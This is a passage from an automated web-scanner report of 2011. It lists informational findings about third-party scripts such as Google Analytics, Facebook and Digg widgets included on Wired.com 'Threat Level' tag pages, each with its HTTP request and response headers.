6.157. http://www.wired.com/threatlevel/tag/intellectual-property/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/intellectual-property/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/intellectual-property/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:21:42 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:26 GMT
Date: Wed, 12 Jan 2011 15:34:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.158. http://www.wired.com/threatlevel/tag/mpaa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/mpaa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/mpaa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:20:07 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=433
Expires: Wed, 12 Jan 2011 15:41:44 GMT
Date: Wed, 12 Jan 2011 15:34:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.159. http://www.wired.com/threatlevel/tag/nsa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/nsa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/nsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:50:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:32 GMT
Date: Wed, 12 Jan 2011 15:34:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.160. http://www.wired.com/threatlevel/tag/obama/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/obama/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/obama/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:17 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=452
Expires: Wed, 12 Jan 2011 15:42:06 GMT
Date: Wed, 12 Jan 2011 15:34:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.161. http://www.wired.com/threatlevel/tag/piracy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/piracy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/piracy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:19 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:52 GMT
Date: Wed, 12 Jan 2011 15:34:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.162. http://www.wired.com/threatlevel/tag/pirate-bay-trial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/pirate-bay-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/pirate-bay-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:16:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:12 GMT
Date: Wed, 12 Jan 2011 15:35:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.163. http://www.wired.com/threatlevel/tag/pirate-bay/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/pirate-bay/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/pirate-bay/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:51:58 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=472
Expires: Wed, 12 Jan 2011 15:42:59 GMT
Date: Wed, 12 Jan 2011 15:35:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.164. http://www.wired.com/threatlevel/tag/politics/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:22 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:14 GMT
Date: Wed, 12 Jan 2011 15:35:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.165. http://www.wired.com/threatlevel/tag/privacy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/privacy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/privacy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:20:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=434
Expires: Wed, 12 Jan 2011 15:42:38 GMT
Date: Wed, 12 Jan 2011 15:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.166. http://www.wired.com/threatlevel/tag/riaa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/riaa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/riaa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:24 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:29 GMT
Date: Wed, 12 Jan 2011 15:35:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.167. http://www.wired.com/threatlevel/tag/segvec/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/segvec/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/segvec/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:26 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:37 GMT
Date: Wed, 12 Jan 2011 15:35:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.168. http://www.wired.com/threatlevel/tag/supreme-court/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/supreme-court/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/supreme-court/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:27 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:38 GMT
Date: Wed, 12 Jan 2011 15:35:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.169. http://www.wired.com/threatlevel/tag/surveillance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/surveillance/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/surveillance/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:39 GMT
Date: Wed, 12 Jan 2011 15:35:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.170. http://www.wired.com/threatlevel/tag/tjx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/tjx/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/tjx/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
